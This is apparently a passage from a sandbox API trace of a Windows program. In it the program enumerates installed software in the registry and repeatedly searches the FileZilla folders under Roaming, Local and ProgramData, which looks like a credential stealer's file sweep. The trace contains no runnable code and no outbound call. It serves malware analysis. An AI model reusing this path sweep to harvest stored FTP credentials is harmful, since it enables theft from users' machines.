AllocationProtect=0x4, RegionSize=0x15000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.048] GetProcessHeap () returned 0x8e0000 [0164.048] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0164.048] VirtualQuery (in: lpAddress=0x90b458, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.048] GetProcessHeap () returned 0x8e0000 [0164.048] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b458 | out: hHeap=0x8e0000) returned 1 [0164.048] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x3, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.048] RegCloseKey (hKey=0x100) returned 0x0 [0164.048] VirtualQuery (in: lpAddress=0x910b70, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x17000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.048] GetProcessHeap () returned 0x8e0000 [0164.048] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b70 | out: hHeap=0x8e0000) returned 1 [0164.048] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.048] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0164.048] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0164.048] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0164.048] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0164.048] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0164.048] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0xb, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0164.049] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0164.049] GetProcessHeap () returned 0x8e0000 [0164.049] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0164.049] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0164.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0164.049] lstrlenW (lpString="\\FileZilla") returned 10 [0164.049] GetProcessHeap () returned 0x8e0000 [0164.049] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x90fb88 [0164.049] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0164.049] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" [0164.049] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa88, dwLength=0x1c | out: lpBuffer=0x2dfa88*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.049] GetProcessHeap () returned 0x8e0000 [0164.049] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0164.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.049] lstrlenW (lpString="\\*.*") returned 4 [0164.049] GetProcessHeap () returned 0x8e0000 [0164.049] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0164.049] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" [0164.049] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*" [0164.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.049] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.049] GetProcessHeap () returned 0x8e0000 [0164.049] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.049] lstrlenW (lpString="\\*.*") returned 4 [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0164.050] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" [0164.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*" [0164.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.050] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned 55 [0164.050] lstrlenW (lpString="\\*.*") returned 4 [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0164.050] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla" [0164.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*" [0164.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.050] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.050] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa94, dwLength=0x1c | out: lpBuffer=0x2dfa94*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0164.050] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0164.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0164.050] lstrlenW (lpString="\\FileZilla") returned 10 [0164.050] GetProcessHeap () returned 0x8e0000 [0164.050] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x90fb88 [0164.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0164.051] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" [0164.051] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa88, dwLength=0x1c | out: lpBuffer=0x2dfa88*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.051] GetProcessHeap () returned 0x8e0000 [0164.051] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0164.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.051] lstrlenW (lpString="\\*.*") returned 4 [0164.051] GetProcessHeap () returned 0x8e0000 [0164.051] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0164.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" [0164.051] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*" [0164.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.051] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.051] GetProcessHeap () returned 0x8e0000 [0164.051] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.051] lstrlenW (lpString="\\*.*") returned 4 [0164.051] GetProcessHeap () returned 0x8e0000 [0164.051] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0164.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" [0164.051] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*" [0164.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.051] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.051] GetProcessHeap () returned 0x8e0000 [0164.051] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.052] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned 53 [0164.052] lstrlenW (lpString="\\*.*") returned 4 [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0164.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla" [0164.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*" [0164.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.052] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0164.052] VirtualQuery (in: lpAddress=0x90fb88, lpBuffer=0x2dfa94, dwLength=0x1c | out: lpBuffer=0x2dfa94*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb88 | out: hHeap=0x8e0000) returned 1 [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0164.052] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0164.052] lstrlenW (lpString="C:\\ProgramData") returned 14 [0164.052] lstrlenW (lpString="\\FileZilla") returned 10 [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0164.052] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0164.052] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\FileZilla" | out: lpString1="C:\\ProgramData\\FileZilla") returned="C:\\ProgramData\\FileZilla" [0164.052] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa88, dwLength=0x1c | out: lpBuffer=0x2dfa88*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.052] GetProcessHeap () returned 0x8e0000 [0164.052] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0164.052] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.052] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.052] lstrlenW (lpString="\\*.*") returned 4 [0164.052] GetProcessHeap () returned 0x8e0000 [0164.053] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0164.053] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\FileZilla" | out: lpString1="C:\\ProgramData\\FileZilla") returned="C:\\ProgramData\\FileZilla" [0164.053] lstrcatW (in: lpString1="C:\\ProgramData\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\FileZilla\\*.*") returned="C:\\ProgramData\\FileZilla\\*.*" [0164.053] FindFirstFileW (in: lpFileName="C:\\ProgramData\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x29, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.053] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.053] GetProcessHeap () returned 0x8e0000 [0164.053] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0164.053] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.053] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.053] lstrlenW (lpString="\\*.*") returned 4 [0164.053] GetProcessHeap () returned 0x8e0000 [0164.053] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0164.053] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\FileZilla" | out: lpString1="C:\\ProgramData\\FileZilla") returned="C:\\ProgramData\\FileZilla" [0164.053] lstrcatW (in: lpString1="C:\\ProgramData\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\FileZilla\\*.*") returned="C:\\ProgramData\\FileZilla\\*.*" [0164.053] FindFirstFileW (in: lpFileName="C:\\ProgramData\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x29, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.053] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.053] GetProcessHeap () returned 0x8e0000 [0164.053] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0164.053] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.053] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0164.053] lstrlenW (lpString="\\*.*") returned 4 [0164.053] GetProcessHeap () returned 0x8e0000 [0164.053] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0164.053] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\FileZilla" | out: lpString1="C:\\ProgramData\\FileZilla") returned="C:\\ProgramData\\FileZilla" [0164.053] lstrcatW (in: lpString1="C:\\ProgramData\\FileZilla", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\FileZilla\\*.*") returned="C:\\ProgramData\\FileZilla\\*.*" [0164.053] FindFirstFileW (in: lpFileName="C:\\ProgramData\\FileZilla\\*.*", lpFindFileData=0x2df860 | out: lpFindFileData=0x2df860*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x29, ftLastWriteTime.dwLowDateTime=0x2df888, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92䀹-ိ\x07")) returned 0xffffffff [0164.053] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2df81c, dwLength=0x1c | out: lpBuffer=0x2df81c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.054] GetProcessHeap () returned 0x8e0000 [0164.054] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0164.054] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa94, dwLength=0x1c | out: lpBuffer=0x2dfa94*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.054] GetProcessHeap () returned 0x8e0000 [0164.054] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 